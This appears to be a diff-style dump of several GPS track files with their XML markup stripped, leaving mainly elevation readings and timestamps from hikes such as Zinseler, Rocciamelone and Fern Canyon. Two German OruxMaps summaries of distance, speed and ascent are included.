+2015-10-24T10:34:59Z
+
+
+1826.800048828125
+2015-10-24T10:40:29Z
+
+
+1810.4000244140625
+2015-10-24T10:43:29Z
+
+
+1726.800048828125
+2015-10-24T10:50:59Z
+
+
+1705.199951171875
+2015-10-24T10:52:59Z
+
+
+1654.5999755859375
+2015-10-24T11:01:29Z
+
+
+1613.0
+2015-10-24T11:05:59Z
+
+
+1609.199951171875
+2015-10-24T11:06:29Z
+
+
+1608.800048828125
+2015-10-24T11:07:59Z
+
+
+1596.0
+2015-10-24T11:08:59Z
+
+
+1597.800048828125
+2015-10-24T11:09:59Z
+
+
+1588.4000244140625
+2015-10-24T11:10:59Z
+
+
+1583.5999755859375
+2015-10-24T11:11:59Z
+
+
+1579.0
+2015-10-24T11:12:59Z
+
+
+1575.800048828125
+2015-10-24T11:13:59Z
+
+
+1570.199951171875
+2015-10-24T11:19:29Z
+
+
+1565.5999755859375
+2015-10-24T11:23:29Z
+
+
+1560.0
+2015-10-24T11:28:59Z
+
+
+1547.0
+2015-10-24T11:32:30Z
+ "
+"
+
+
+
+
+
+
+Garmin International
+2017-07-27T12:33:36Z
+
+2017-07-27 14:33:32
+
+
+
+
+
+2139.07
+2017-07-27T05:25:27Z
+
+
+2192.42
+2017-07-27T05:30:03Z
+
+
+2307.78
+2017-07-27T05:45:14Z
+
+
+2365.46
+2017-07-27T05:53:47Z
+
+
+2371.23
+2017-07-27T05:56:17Z
+
+
+2382.28
+2017-07-27T05:58:48Z
+
+
+2389.49
+2017-07-27T06:02:30Z
+
+
+2402.47
+2017-07-27T06:05:17Z
+
+
+2435.16
+2017-07-27T06:10:02Z
+
+
+2475.05
+2017-07-27T06:16:19Z
+
+
+2514.95
+2017-07-27T06:22:52Z
+
+
+2537.54
+2017-07-27T06:27:16Z
+
+
+2582.24
+2017-07-27T06:32:54Z
+
+
+2590.41
+2017-07-27T06:39:22Z
+
+
+2614.92
+2017-07-27T06:42:28Z
+
+
+2672.6
+2017-07-27T06:50:09Z
+
+
+2691.35
+2017-07-27T06:53:52Z
+
+
+2712.98
+2017-07-27T06:56:55Z
+
+
+2721.15
+2017-07-27T07:01:55Z
+
+
+2728.36
+2017-07-27T07:05:28Z
+
+
+2753.35
+2017-07-27T07:08:20Z
+
+
+2774.02
+2017-07-27T07:11:23Z
+
+
+2796.61
+2017-07-27T07:17:37Z
+
+
+2877.84
+2017-07-27T07:42:28Z
+
+
+2928.31
+2017-07-27T07:49:42Z
+
+
+2961.0
+2017-07-27T07:53:38Z
+
+
+2990.32
+2017-07-27T07:57:31Z
+
+
+3016.27
+2017-07-27T08:01:36Z
+
+
+3079.72
+2017-07-27T08:16:31Z
+
+
+3078.76
+2017-07-27T08:26:25Z
+
+
+3069.15
+2017-07-27T08:30:52Z
+
+
+3092.7
+2017-07-27T08:34:21Z
+
+
+3094.14
+2017-07-27T08:38:14Z
+
+
+3103.75
+2017-07-27T08:41:55Z
+
+
+3105.2
+2017-07-27T08:51:14Z
+
+
+3129.23
+2017-07-27T08:59:25Z
+
+
+3151.34
+2017-07-27T09:04:52Z
+
+
+3155.66
+2017-07-27T09:10:59Z
+
+
+3113.85
+2017-07-27T09:37:03Z
+
+
+3105.68
+2017-07-27T09:42:16Z
+
+
+3101.83
+2017-07-27T09:45:35Z
+
+
+3102.79
+2017-07-27T09:56:00Z
+
+
+3101.35
+2017-07-27T10:00:34Z
+
+
+3071.55
+2017-07-27T10:10:18Z
+
+
+3046.07
+2017-07-27T10:21:45Z
+
+
+2973.5
+2017-07-27T10:28:02Z
+
+
+2940.33
+2017-07-27T10:33:01Z
+
+
+2906.68
+2017-07-27T10:38:29Z
+
+
+2863.42
+2017-07-27T10:42:01Z
+
+
+2817.76
+2017-07-27T10:49:33Z
+
+
+2795.65
+2017-07-27T10:51:51Z
+
+
+2771.14
+2017-07-27T10:55:49Z
+
+
+2751.91
+2017-07-27T11:01:29Z
+
+
+2732.68
+2017-07-27T11:03:56Z
+
+
+2732.68
+2017-07-27T11:20:39Z
+
+
+2671.64
+2017-07-27T11:37:57Z
+
+
+2636.07
+2017-07-27T11:41:07Z
+
+
+2578.39
+2017-07-27T11:47:51Z
+
+
+2545.71
+2017-07-27T11:52:49Z
+
+
+2441.89
+2017-07-27T12:00:25Z
+
+
+2404.39
+2017-07-27T12:03:37Z
+
+
+2394.78
+2017-07-27T12:06:00Z
+
+
+2368.35
+2017-07-27T12:11:32Z
+
+
+2328.93
+2017-07-27T12:15:18Z
+
+
+2229.43
+2017-07-27T12:26:35Z
+
+
+2199.15
+2017-07-27T12:32:25Z
+ "
+"
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+ "
+"
+
+
+Tourenplanung am 7. November 2015
+
+null - TemporaryUserGroup
+
+
+
+2015-11-07T18:05:46Z
+
+Tourenplanung am 7. November 2015
+
+
+
+565.8
+
+
+563.6
+
+
+564.9
+
+
+596.5
+
+
+595.0
+
+
+596.7
+
+
+591.5
+
+
+
+591.5
+
+
+596.7
+
+
+595.0
+
+
+596.5
+
+
+564.9
+
+
+563.6
+
+
+565.8
+
+
+
+565.8
+
+
+582.5
+
+
+581.4
+
+
+577.3
+
+
+559.9
+
+
+553.3
+
+
+564.2
+
+
+576.2
+
+
+592.2
+
+
+593.6
+
+
+595.3
+
+
+598.6
+ "
+"
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+ "
+"
+
+
+
+
+
+
+Garmin International
+2015-11-08T15:22:31Z
+
+2015-11-08 16:22:29
+
+
+
+
+
+
+1130.13
+2015-11-08T07:11:56Z
+
+
+1158.81
+2015-11-08T07:15:49Z
+
+
+1209.39
+2015-11-08T07:22:36Z
+
+
+1229.27
+2015-11-08T07:25:55Z
+
+
+1247.99
+2015-11-08T07:27:54Z
+
+
+1290.86
+2015-11-08T07:33:32Z
+
+
+1317.83
+2015-11-08T07:36:52Z
+
+
+1336.91
+2015-11-08T07:39:09Z
+
+
+1382.83
+2015-11-08T07:46:47Z
+
+
+1396.56
+2015-11-08T07:48:29Z
+
+
+1426.67
+2015-11-08T07:58:06Z
+
+
+1444.71
+2015-11-08T08:02:03Z
+
+
+1458.29
+2015-11-08T08:04:45Z
+
+
+1501.9
+2015-11-08T08:12:29Z
+
+
+1630.42
+2015-11-08T08:33:41Z
+
+
+1728.92
+2015-11-08T08:48:21Z
+
+
+1741.08
+2015-11-08T08:50:31Z
+
+
+1747.88
+2015-11-08T08:54:05Z
+
+
+1795.65
+2015-11-08T09:05:14Z
+
+
+1827.55
+2015-11-08T09:10:24Z
+
+
+1847.57
+2015-11-08T09:13:33Z
+
+
+1939.21
+2015-11-08T09:35:04Z
+
+
+1947.5
+2015-11-08T09:49:03Z
+
+
+1967.22
+2015-11-08T09:52:18Z
+
+
+2042.9
+2015-11-08T10:08:16Z
+
+
+2060.17
+2015-11-08T10:12:01Z
+
+
+2055.46
+2015-11-08T10:17:07Z
+
+
+2059.19
+2015-11-08T10:19:25Z
+
+
+2086.87
+2015-11-08T10:22:43Z
+
+
+2110.96
+2015-11-08T10:28:47Z
+
+
+2105.44
+2015-11-08T10:30:30Z
+
+
+2126.47
+2015-11-08T12:42:19Z
+
+
+2096.31
+2015-11-08T12:46:02Z
+
+
+2069.36
+2015-11-08T12:50:57Z
+
+
+2048.52
+2015-11-08T12:52:21Z
+
+
+2007.32
+2015-11-08T12:58:57Z
+
+
+1995.38
+2015-11-08T13:02:19Z
+
+
+2026.89
+2015-11-08T13:06:16Z
+
+
+2051.27
+2015-11-08T13:09:54Z
+
+
+2066.66
+2015-11-08T13:19:20Z
+
+
+2048.54
+2015-11-08T13:22:59Z
+
+
+2030.58
+2015-11-08T13:24:10Z
+
+
+2013.04
+2015-11-08T13:25:24Z
+
+
+1972.28
+2015-11-08T13:28:08Z
+
+
+1953.05
+2015-11-08T13:31:52Z
+
+
+1939.6
+2015-11-08T13:36:37Z
+
+
+1909.98
+2015-11-08T13:43:26Z
+
+
+1900.12
+2015-11-08T13:47:24Z
+
+
+1870.42
+2015-11-08T13:54:47Z
+
+
+1870.74
+2015-11-08T13:56:39Z
+
+
+1858.99
+2015-11-08T13:59:30Z
+
+
+1826.86
+2015-11-08T14:06:01Z
+
+
+1817.53
+2015-11-08T14:08:26Z
+
+
+1803.6
+2015-11-08T14:10:53Z
+
+
+1766.2
+2015-11-08T14:19:58Z
+
+
+1743.13
+2015-11-08T14:23:28Z
+
+
+1711.51
+2015-11-08T14:28:33Z
+
+
+1680.49
+2015-11-08T14:32:31Z
+
+
+1666.86
+2015-11-08T14:33:40Z
+
+
+1659.83
+2015-11-08T14:36:07Z
+
+
+1612.7
+2015-11-08T14:41:12Z
+
+
+1526.12
+2015-11-08T14:48:54Z
+
+
+1512.99
+2015-11-08T14:49:53Z
+
+
+1429.36
+2015-11-08T14:57:08Z
+
+
+1413.96
+2015-11-08T14:58:00Z
+
+
+1412.02
+2015-11-08T14:59:27Z
+
+
+1408.55
+2015-11-08T15:02:23Z
+
+
+1331.94
+2015-11-08T15:10:49Z
+
+
+1268.4
+2015-11-08T15:13:55Z
+
+
+1223.86
+2015-11-08T15:17:13Z
+
+
+1159.47
+2015-11-08T15:20:46Z
+
+
+1143.99
+2015-11-08T15:22:28Z
+ "
+"
+
+
+Zinseler
+
+
+
+
+
+OruxMaps
+2015-05-18T15:37:31Z
+
+
+Zinseler
+<h1>OruxMaps</h1><br /><hr align=""center"" width=""480"" style=""height: 2px; width: 517px""/><h2>Name: Zinseler</h2><br /><p>Startzeit: 05/18/2015 17:37</p><p>Zielzeit: 05/18/2015 19:52</p><p>Strecke: 5,2km (02:15)</p><p>Bewegungszeit: 01:36</p><p>Ø-Geschwindigkeit: 2,3km/h</p><p>Netto-Geschwindigkeit: 3,3km/h</p><p>Max. Geschwindigkeit: 34,2km/h</p><p>Minimale Höhe: 2145m</p><p>Maximale Höhe: 2421m</p><p>Steig-Geschw.: 412,7m/h</p><p>Sink-Geschw.: -489,9m/h</p><p>Aufstieg: 410m</p><p>Abstieg: -425m</p><p>Steigzeit: 00:59</p><p>Sinkzeit: 00:52</p><hr align=""center"" width=""480"" style=""height: 2px; width: 517px""/>
+
+Unbestimmt
+
+
+
+
+
+2162.4
+2015-05-18T15:37:32Z
+
+
+2165.36
+2015-05-18T15:39:36Z
+
+
+2168.21
+2015-05-18T15:40:12Z
+
+
+2166.0
+2015-05-18T15:41:01Z
+
+
+2168.25
+2015-05-18T15:41:24Z
+
+
+2166.77
+2015-05-18T15:42:18Z
+
+
+2170.12
+2015-05-18T15:43:00Z
+
+
+2157.65
+2015-05-18T15:44:37Z
+
+
+2169.38
+2015-05-18T15:45:27Z
+
+
+2177.0
+2015-05-18T15:47:13Z
+
+
+2178.96
+2015-05-18T15:47:20Z
+
+
+2179.67
+2015-05-18T15:47:22Z
+
+
+2194.34
+2015-05-18T15:49:04Z
+
+
+2204.4
+2015-05-18T15:50:35Z
+
+
+2211.74
+2015-05-18T15:51:41Z
+
+
+2248.24
+2015-05-18T15:55:40Z
+
+
+2304.46
+2015-05-18T16:01:02Z
+
+
+2314.18
+2015-05-18T16:02:45Z
+
+
+2322.77
+2015-05-18T16:03:39Z
+
+
+2345.25
+2015-05-18T16:05:41Z
+
+
+2353.71
+2015-05-18T16:07:45Z
+
+
+2338.08
+2015-05-18T16:10:02Z
+
+
+2316.0
+2015-05-18T16:11:17Z
+
+
+2323.62
+2015-05-18T16:18:06Z
+
+
+2326.98
+2015-05-18T16:19:35Z
+
+
+2325.77
+2015-05-18T16:22:32Z
+
+
+2325.78
+2015-05-18T16:22:47Z
+
+
+2303.62
+2015-05-18T16:27:18Z
+
+
+2305.74
+2015-05-18T16:27:43Z
+
+
+2305.62
+2015-05-18T16:27:44Z
+
+
+2301.33
+2015-05-18T16:28:16Z
+
+
+2336.99
+2015-05-18T16:33:38Z
+
+
+2344.74
+2015-05-18T16:34:42Z
+
+
+2373.87
+2015-05-18T16:38:19Z
+
+
+2390.12
+2015-05-18T16:40:02Z
+
+
+2418.59
+2015-05-18T16:43:05Z
+
+
+2401.6
+2015-05-18T16:47:44Z
+
+
+2386.35
+2015-05-18T16:48:57Z
+
+
+2348.41
+2015-05-18T16:50:37Z
+
+
+2346.28
+2015-05-18T16:51:09Z
+
+
+2329.35
+2015-05-18T16:52:43Z
+
+
+2313.87
+2015-05-18T16:54:19Z
+
+
+2316.4
+2015-05-18T16:58:22Z
+
+
+2332.13
+2015-05-18T16:59:24Z
+
+
+2338.66
+2015-05-18T17:00:06Z
+
+
+2342.31
+2015-05-18T17:00:54Z
+
+
+2348.85
+2015-05-18T17:02:49Z
+
+
+2358.59
+2015-05-18T17:03:34Z
+
+
+2362.83
+2015-05-18T17:04:14Z
+
+
+2379.16
+2015-05-18T17:08:24Z
+
+
+2365.09
+2015-05-18T17:09:14Z
+
+
+2347.12
+2015-05-18T17:10:55Z
+
+
+2315.25
+2015-05-18T17:13:13Z
+
+
+2276.41
+2015-05-18T17:15:38Z
+
+
+2263.84
+2015-05-18T17:17:04Z
+
+
+2259.37
+2015-05-18T17:17:39Z
+
+
+2207.25
+2015-05-18T17:21:13Z
+
+
+2190.15
+2015-05-18T17:22:56Z
+
+
+2175.25
+2015-05-18T17:25:01Z
+
+
+2162.37
+2015-05-18T17:27:27Z
+
+
+2171.23
+2015-05-18T17:29:04Z
+
+
+2172.25
+2015-05-18T17:29:54Z
+
+
+2159.41
+2015-05-18T17:30:35Z
+
+
+2159.74
+2015-05-18T17:31:51Z
+
+
+2160.25
+2015-05-18T17:32:55Z
+
+
+2151.25
+2015-05-18T17:52:30Z
+
+
+2158.0
+2015-05-18T17:52:32Z
+ "
+"
+
+
+
+
+
+
+2016-08-02T19:49:27Z
+
+
+Fern Canyon
+
+
+
+17.0
+2016-08-02T19:49:27Z
+
+
+
+
+0.000000
+
+24.0
+2016-08-02T19:50:33Z
+
+
+
+
+7.277794
+
+22.0
+2016-08-02T19:51:22Z
+
+
+
+
+4.465218
+
+37.0
+2016-08-02T19:53:11Z
+
+
+
+
+12.848969
+
+28.0
+2016-08-02T19:54:06Z
+
+
+
+
+2.243195
+
+42.0
+2016-08-02T19:55:22Z
+
+
+
+
+1.384399
+
+47.0
+2016-08-02T19:56:25Z
+
+
+
+
+5.951782
+
+52.0
+2016-08-02T19:57:03Z
+
+
+
+
+1.909424
+
+57.0
+2016-08-02T19:59:05Z
+
+
+
+
+2.090515
+
+61.0
+2016-08-02T19:59:20Z
+
+
+
+
+20.521545
+
+64.0
+2016-08-02T20:01:17Z
+
+
+
+
+2.358948
+
+64.0
+2016-08-02T20:02:07Z
+
+
+
+
+4.100342
+
+64.0
+2016-08-02T20:02:56Z
+
+
+
+
+5.075623
+
+66.0
+2016-08-02T20:03:32Z
+
+
+
+
+9.098938
+
+67.0
+2016-08-02T20:04:20Z
+
+
+
+
+0.737549
+
+62.0
+2016-08-02T20:05:11Z
+
+
+
+
+13.992737
+
+92.0
+2016-08-02T20:07:05Z
+
+
+
+
+6.111145
+
+91.0
+2016-08-02T20:07:22Z
+
+
+
+
+18.486450
+
+76.0
+2016-08-02T20:08:01Z
+
+
+
+
+4.088623
+
+79.0
+2016-08-02T20:09:10Z
+
+
+
+
+12.427368
+
+73.0
+2016-08-02T20:11:23Z
+
+
+
+
+2.309326
+
+79.0
+2016-08-02T20:11:50Z
+
+
+
+
+11.173096
+
+81.0
+2016-08-02T20:16:42Z
+
+
+
+
+162.402466
+
+77.0
+2016-08-02T20:17:20Z
+
+
+
+
+15.113525
+
+82.0
+2016-08-02T20:19:11Z
+
+
+
+
+3.047241
+
+80.0
+2016-08-02T20:20:18Z
+
+
+
+
+3.317627
+
+88.0
+2016-08-02T20:22:13Z
+
+
+
+
+1.424072
+
+76.0
+2016-08-02T20:22:46Z
+
+
+
+
+2.958740
+
+86.0
+2016-08-02T20:40:49Z
+
+
+
+
+28.678711
+
+96.0
+2016-08-02T20:41:05Z
+
+
+
+
+0.736938
+
+90.0
+2016-08-02T20:41:46Z
+
+
+
+
+18.315918
+
+78.0
+2016-08-02T20:42:18Z
+
+
+
+
+11.082153
+
+62.0
+2016-08-02T20:43:16Z
+
+
+
+
+16.127441
+
+35.0
+2016-08-02T20:45:03Z
+
+
+
+
+5.073730
+
+30.0
+2016-08-02T20:45:54Z
+
+
+
+
+4.387939
+
+23.0
+2016-08-02T20:46:42Z
+
+
+
+
+1.468994
+
+30.0
+2016-08-02T20:47:25Z
+
+
+
+
+1.957275
+
+23.0
+2016-08-02T20:48:54Z
+
+
+
+
+7.217773
+
+17.0
+2016-08-02T20:50:46Z
+
+
+
+
+6.356689 "
+"
+
+
+
+
+
+
+Garmin International
+2015-04-28T09:38:06Z
+
+
+Track
+
+
+
+
+
+
+774.3242188
+
+
+778.1132813
+
+
+777.6914063
+
+
+771.5898438
+
+
+767.484375
+
+
+748.78125
+
+
+743.7617188
+
+
+745.9257813
+
+
+743.859375
+
+
+741.8320313
+
+
+737.140625
+
+
+734.2773438
+
+
+733.609375
+
+
+733.6328125
+
+
+731.28125
+
+
+729.2773438
+
+
+728.640625
+
+
+728.5273438
+
+
+729.609375
+
+
+730.484375
+
+
+729.6601563
+
+
+737.1289063
+
+
+737.859375
+
+
+751.4882813
+
+
+752.3671875
+
+
+757.7070313
+
+
+772.7070313
+
+
+781.5859375
+
+
+786.3984375
+
+
+784.8671875
+
+
+788.75
+
+
+790.8828125
+
+
+789.015625
+
+
+780.03125
+
+
+765.8242188
+
+
+760.2070313
+
+
+763.0664063
+
+
+779.6757813
+
+
+783.78125
+
+
+793.53125
+
+
+806.5546875
+
+
+815.4492188
+
+
+821.1054688
+
+
+823.6835938
+
+
+825.3945313
+
+
+810.75
+
+
+804.9765625
+
+
+804.9726563
+
+
+804.9726563
+
+
+804.8789063
+
+
+804.7578125
+
+
+808.34375
+
+
+803.5976563
+
+
+803.8789063
+
+
+805.9726563
+
+
+804.1132813
+
+
+803.1054688
+
+
+802.546875
+
+
+800.5820313
+
+
+795.2304688
+
+
+785.9453125
+
+
+781.4414063
+
+
+777.9570313
+
+
+774.9335938
+
+
+775.8828125
+
+
+777.3320313
+
+
+778.9296875
+
+
+779.7890625
+
+
+778.2460938
+
+
+777.7851563
+
+
+778.1054688
+
+
+774.4921875
+ "
+"
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+ "
+"
+
+
+ape@map my Phone my Guide
+
+
+
+
+
+2017-09-08 16_11_09
+
+
+
+1070.0
+2017-09-11T05:58:53Z
+
+
+1070.0
+2017-09-11T06:01:25Z
+
+
+1089.0
+2017-09-11T06:08:03Z
+
+
+1061.0
+2017-09-11T06:11:01Z
+
+
+1072.0
+2017-09-11T06:13:05Z
+
+
+1121.0
+2017-09-11T06:15:18Z
+
+
+1074.0
+2017-09-11T06:18:16Z
+
+
+1175.0
+2017-09-11T06:23:36Z
+
+
+1194.0
+2017-09-11T06:30:55Z
+
+
+1165.0
+2017-09-11T06:34:34Z
+
+
+1192.0
+2017-09-11T06:37:07Z
+
+
+1249.0
+2017-09-11T06:40:14Z
+
+
+1255.0
+2017-09-11T06:44:52Z
+
+
+1296.0
+2017-09-11T06:50:12Z
+
+
+1292.0
+2017-09-11T06:51:46Z
+
+
+1301.0
+2017-09-11T06:54:13Z
+
+
+1324.0
+2017-09-11T06:56:58Z
+
+
+1358.0
+2017-09-11T07:14:04Z
+
+
+1374.0
+2017-09-11T07:16:45Z
+
+
+1378.0
+2017-09-11T07:19:25Z
+
+
+1414.0
+2017-09-11T07:21:32Z
+
+
+1438.0
+2017-09-11T07:25:06Z
+
+
+1453.0
+2017-09-11T07:27:30Z
+
+
+1478.0
+2017-09-11T07:34:46Z
+
+
+1494.0
+2017-09-11T07:35:36Z
+
+
+1488.0
+2017-09-11T07:37:17Z
+
+
+1513.0
+2017-09-11T07:39:58Z
+
+
+1516.0
+2017-09-11T07:41:01Z
+
+
+1535.0
+2017-09-11T07:47:38Z
+
+
+1530.0
+2017-09-11T07:48:28Z
+
+
+1542.0
+2017-09-11T07:50:18Z
+
+
+1544.0
+2017-09-11T07:51:28Z
+
+
+1548.0
+2017-09-11T07:52:17Z
+
+
+1553.0
+2017-09-11T07:53:10Z
+
+
+1555.0
+2017-09-11T07:57:59Z
+
+
+1556.0
+2017-09-11T08:01:24Z
+
+
+1540.0
+2017-09-11T08:04:46Z
+
+
+1528.0
+2017-09-11T08:05:29Z
+
+
+1547.0
+2017-09-11T08:07:13Z
+
+
+1553.0
+2017-09-11T08:07:56Z
+
+
+1551.0
+2017-09-11T08:10:24Z
+
+
+1554.0
+2017-09-11T08:11:44Z
+
+
+1551.0
+2017-09-11T08:14:53Z
+
+
+1566.0
+2017-09-11T08:18:01Z
+
+
+1560.0
+2017-09-11T08:18:50Z
+
+
+1552.0
+2017-09-11T08:23:29Z
+
+
+1575.0
+2017-09-11T08:25:31Z
+
+
+1578.0
+2017-09-11T08:26:51Z
+
+
+1601.0
+2017-09-11T08:42:00Z
+
+
+1602.0
+2017-09-11T08:43:12Z
+
+
+1610.0
+2017-09-11T08:45:43Z
+
+
+1628.0
+2017-09-11T08:47:25Z
+
+
+1651.0
+2017-09-11T08:51:03Z
+
+
+1662.0
+2017-09-11T08:51:55Z
+
+
+1699.0
+2017-09-11T08:57:39Z
+
+
+1713.0
+2017-09-11T08:59:02Z
+
+
+1723.0
+2017-09-11T09:01:06Z
+
+
+1795.0
+2017-09-11T09:09:55Z
+
+
+1807.0
+2017-09-11T09:11:34Z
+
+
+1823.0
+2017-09-11T09:14:20Z
+
+
+1856.0
+2017-09-11T09:18:48Z
+
+
+1857.0
+2017-09-11T09:19:42Z
+
+
+1876.0
+2017-09-11T09:25:09Z
+
+
+1883.0
+2017-09-11T09:29:39Z
+
+
+1881.0
+2017-09-11T09:32:22Z
+
+
+1930.0
+2017-09-11T09:41:52Z
+
+
+2014.0
+2017-09-11T09:50:42Z
+
+
+2121.0
+2017-09-11T10:16:04Z
+ "
+"
+
+
+Rocciamelone
+
+
+
+
+
+OruxMaps
+2015-08-25T04:58:22Z
+
+
+Rocciamelone
+<h1>OruxMaps</h1><br /><hr align=""center"" width=""480"" style=""height: 2px; width: 517px""/><h2>Name: Rocciamelone</h2><br /><p>Startzeit: 08/25/2015 06:58</p><p>Zielzeit: 08/25/2015 10:15</p><p>Strecke: 4,5km (03:16)</p><p>Bewegungszeit: 01:55</p><p>Ø-Geschwindigkeit: 1,4km/h</p><p>Netto-Geschwindigkeit: 2,4km/h</p><p>Max. Geschwindigkeit: 7,3km/h</p><p>Minimale Höhe: 2137m</p><p>Maximale Höhe: 3527m</p><p>Steig-Geschw.: 503,1m/h</p><p>Sink-Geschw.: -358,4m/h</p><p>Aufstieg: 1335m</p><p>Abstieg: -29m</p><p>Steigzeit: 02:39</p><p>Sinkzeit: 00:04</p><hr align=""center"" width=""480"" style=""height: 2px; width: 517px""/>
+
+Unbestimmt
+
+
+
+
+
+2171.28
+2015-08-25T04:58:23Z
+
+
+2169.08
+2015-08-25T04:58:26Z
+
+
+2144.67
+2015-08-25T05:04:18Z
+
+
+2151.22
+2015-08-25T05:05:18Z
+
+
+2165.21
+2015-08-25T05:06:19Z
+
+
+2175.3
+2015-08-25T05:07:01Z
+
+
+2180.0
+2015-08-25T05:08:10Z
+
+
+2201.84
+2015-08-25T05:10:06Z
+
+
+2227.03
+2015-08-25T05:12:07Z
+
+
+2253.26
+2015-08-25T05:14:27Z
+
+
+2276.77
+2015-08-25T05:16:34Z
+
+
+2283.28
+2015-08-25T05:17:21Z
+
+
+2303.89
+2015-08-25T05:18:56Z
+
+
+2318.43
+2015-08-25T05:20:43Z
+
+
+2343.67
+2015-08-25T05:22:38Z
+
+
+2354.97
+2015-08-25T05:23:41Z
+
+
+2371.71
+2015-08-25T05:24:40Z
+
+
+2447.77
+2015-08-25T05:32:39Z
+
+
+2470.3
+2015-08-25T05:34:50Z
+
+
+2482.66
+2015-08-25T05:37:41Z
+
+
+2517.49
+2015-08-25T05:38:34Z
+
+
+2565.38
+2015-08-25T05:44:59Z
+
+
+2572.77
+2015-08-25T05:45:51Z
+
+
+2606.25
+2015-08-25T05:48:48Z
+
+
+2622.89
+2015-08-25T05:50:17Z
+
+
+2633.15
+2015-08-25T05:51:42Z
+
+
+2648.28
+2015-08-25T05:53:16Z
+
+
+2683.29
+2015-08-25T05:56:57Z
+
+
+2702.65
+2015-08-25T05:58:42Z
+
+
+2732.02
+2015-08-25T06:01:38Z
+
+
+2749.27
+2015-08-25T06:03:26Z
+
+
+2763.27
+2015-08-25T06:04:26Z
+
+
+2771.27
+2015-08-25T06:05:57Z
+
+
+2800.89
+2015-08-25T06:08:11Z
+
+
+2804.8
+2015-08-25T06:09:04Z
+
+
+2813.24
+2015-08-25T06:09:46Z
+
+
+2836.65
+2015-08-25T06:11:51Z
+
+
+2906.86
+2015-08-25T06:25:38Z
+
+
+2948.18
+2015-08-25T06:30:32Z
+
+
+3009.3
+2015-08-25T06:38:27Z
+
+
+3024.36
+2015-08-25T06:41:12Z
+
+
+3070.65
+2015-08-25T06:46:14Z
+
+
+3078.4
+2015-08-25T06:47:36Z
+
+
+3113.76
+2015-08-25T06:52:32Z
+
+
+3150.27
+2015-08-25T06:56:36Z
+
+
+3153.02
+2015-08-25T07:13:12Z
+
+
+3183.4
+2015-08-25T07:17:28Z
+
+
+3198.24
+2015-08-25T07:19:17Z
+
+
+3253.9
+2015-08-25T07:25:40Z
+
+
+3259.61
+2015-08-25T07:26:25Z
+
+
+3273.77
+2015-08-25T07:28:15Z
+
+
+3355.3
+2015-08-25T07:42:46Z
+
+
+3419.64
+2015-08-25T07:50:38Z
+
+
+3432.76
+2015-08-25T07:52:38Z
+
+
+3493.77
+2015-08-25T08:02:05Z
+
+
+3515.2
+2015-08-25T08:04:54Z
+
+
+3527.27
+2015-08-25T08:15:08Z
+ "
+"
+
+
+
+
+
+
+Garmin International
+2015-04-22T11:09:02Z
+
+2015-04-22 13:09:00
+
+
+
+
+
+
+458.84
+2015-04-22T06:13:15Z
+
+
+459.87
+2015-04-22T06:14:31Z
+
+
+471.72
+2015-04-22T06:15:57Z
+
+
+507.68
+2015-04-22T06:21:25Z
+
+
+529.14
+2015-04-22T06:23:24Z
+
+
+537.96
+2015-04-22T06:24:18Z
+
+
+584.51
+2015-04-22T06:28:41Z
+
+
+598.49
+2015-04-22T06:30:10Z
+
+
+607.56
+2015-04-22T06:32:27Z
+
+
+614.13
+2015-04-22T06:33:02Z
+
+
+626.27
+2015-04-22T06:34:11Z
+
+
+633.0
+2015-04-22T06:35:42Z
+
+
+675.9
+2015-04-22T06:39:46Z
+
+
+698.91
+2015-04-22T06:43:35Z
+
+
+702.18
+2015-04-22T06:44:56Z
+
+
+707.04
+2015-04-22T06:45:36Z
+
+
+723.63
+2015-04-22T06:47:32Z
+
+
+738.67
+2015-04-22T06:49:35Z
+
+
+751.58
+2015-04-22T06:51:08Z
+
+
+759.43
+2015-04-22T06:52:16Z
+
+
+790.74
+2015-04-22T06:55:56Z
+
+
+803.94
+2015-04-22T06:57:15Z
+
+
+827.01
+2015-04-22T06:59:37Z
+
+
+838.12
+2015-04-22T07:01:00Z
+
+
+843.24
+2015-04-22T07:01:31Z
+
+
+857.43
+2015-04-22T07:03:06Z
+
+
+864.38
+2015-04-22T07:04:01Z
+
+
+876.81
+2015-04-22T07:10:46Z
+
+
+885.33
+2015-04-22T07:12:15Z
+
+
+891.36
+2015-04-22T07:13:03Z
+
+
+894.3
+2015-04-22T07:13:44Z
+
+
+921.38
+2015-04-22T07:16:38Z
+
+
+945.16
+2015-04-22T07:19:32Z
+
+
+955.02
+2015-04-22T07:21:32Z
+
+
+969.54
+2015-04-22T07:23:20Z
+
+
+977.09
+2015-04-22T07:25:09Z
+
+
+1019.19
+2015-04-22T07:31:00Z
+
+
+1085.4
+2015-04-22T07:48:11Z
+
+
+1129.8
+2015-04-22T07:54:07Z
+
+
+1149.07
+2015-04-22T08:00:52Z
+
+
+1161.11
+2015-04-22T08:02:41Z
+
+
+1174.36
+2015-04-22T08:05:30Z
+
+
+1172.88
+2015-04-22T08:06:39Z
+
+
+1153.02
+2015-04-22T08:13:02Z
+
+
+1141.06
+2015-04-22T08:15:57Z
+
+
+1162.4
+2015-04-22T08:21:40Z
+
+
+1175.51
+2015-04-22T08:35:51Z
+
+
+1196.4
+2015-04-22T08:38:57Z
+
+
+1215.45
+2015-04-22T08:41:40Z
+
+
+1226.17
+2015-04-22T08:46:57Z
+
+
+1254.92
+2015-04-22T08:51:39Z
+
+
+1293.69
+2015-04-22T08:59:58Z
+
+
+1321.43
+2015-04-22T09:08:47Z
+
+
+1390.25
+2015-04-22T09:18:38Z
+
+
+1430.08
+2015-04-22T09:27:22Z
+
+
+1460.3
+2015-04-22T09:34:05Z
+
+
+1477.14
+2015-04-22T09:35:53Z
+
+
+1522.1
+2015-04-22T09:44:55Z
+
+
+1559.5
+2015-04-22T09:50:45Z
+
+
+1608.21
+2015-04-22T09:57:47Z
+
+
+1622.86
+2015-04-22T10:00:23Z
+
+
+1632.51
+2015-04-22T10:01:43Z
+
+
+1641.22
+2015-04-22T10:12:29Z
+
+
+1643.41
+2015-04-22T10:44:22Z
+
+
+1660.73
+2015-04-22T10:48:02Z
+
+
+1682.9
+2015-04-22T10:52:36Z
+
+
+1696.35
